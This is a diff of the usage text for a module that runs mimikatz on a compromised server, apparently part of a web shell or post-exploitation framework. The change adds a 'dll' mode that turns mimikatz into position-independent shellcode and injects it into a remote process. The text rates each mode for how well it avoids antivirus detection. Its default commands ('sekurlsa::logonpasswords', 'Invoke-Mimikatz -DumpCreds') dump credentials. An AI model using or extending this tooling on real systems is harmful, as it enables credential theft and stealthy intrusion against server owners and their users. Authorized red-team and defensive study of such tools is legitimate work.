| skipped 24 lines |
25 | 25 | | |
26 | 26 | | |
27 | 27 | | This module allows you to run mimikatz in a versatile way. |
28 | | - | Within this module it is possible to run mimikatz in 2 different way: |
| 28 | + | Within this module it is possible to run mimikatz in 3 different ways: |
29 | 29 | | 'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory; |
30 | | - | 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments. |
| 30 | + | 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments; |
| 31 | + | 'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process. |
31 | 32 | | It is recommended to run the ps1 version because it will be obfuscated and run from memory. |
32 | 33 | | The exe version will be just dropped as clear and could be catched by av scanners. |
| 34 | + | The dll version is the most stealthy but it doesn't support impersonation atm. |
33 | 35 | | |
34 | 36 | | |
35 | 37 | | Usage: |
36 | 38 | | #mimikatz [exec_type] [username] [password] [domain] [custom_command] |
37 | 39 | | |
38 | 40 | | Positional arguments: |
39 | | - | exec_type type of running mimikatz. |
40 | | - | 'ps1' will upload and execute the powershell version of mimikatz |
41 | | - | 'exe' will upload and execute the classic version of binary mimikatz |
| 41 | + | exec_type execution type for running mimikatz: |
| 42 | + | 'ps1' will upload and execute the powershell version of mimikatz |
| 43 | + | 'exe' will upload and execute the classic version of binary mimikatz |
| 44 | + | 'dll' will inject converted dll shellcode into a remote process |
42 | 45 | | Default: 'ps1' |
43 | 46 | | username username of the user to runas the process |
44 | 47 | | password password of the user to runas the process |
| skipped 1 lines |
46 | 49 | | custom_command based on exec_type, the custom command could be: |
47 | 50 | | - 'ps1' : powershell code to add to the ps1 mimikatz module; |
48 | 51 | | - 'exe' : command line arguments to the mimikatz binary; |
| 52 | + | - 'dll' : command line arguments to be executed. |
49 | 53 | | Default: |
50 | 54 | | 'ps1': ';Invoke-Mimikatz -DumpCreds' |
51 | 55 | | 'exe': 'privilege::debug sekurlsa::logonpasswords exit' |
| 56 | + | 'dll': 'privilege::debug sekurlsa::logonpasswords exit' |
52 | 57 | | |
53 | 58 | | Examples: |
54 | 59 | | Run mimikatz as the current user |
| skipped 105 lines |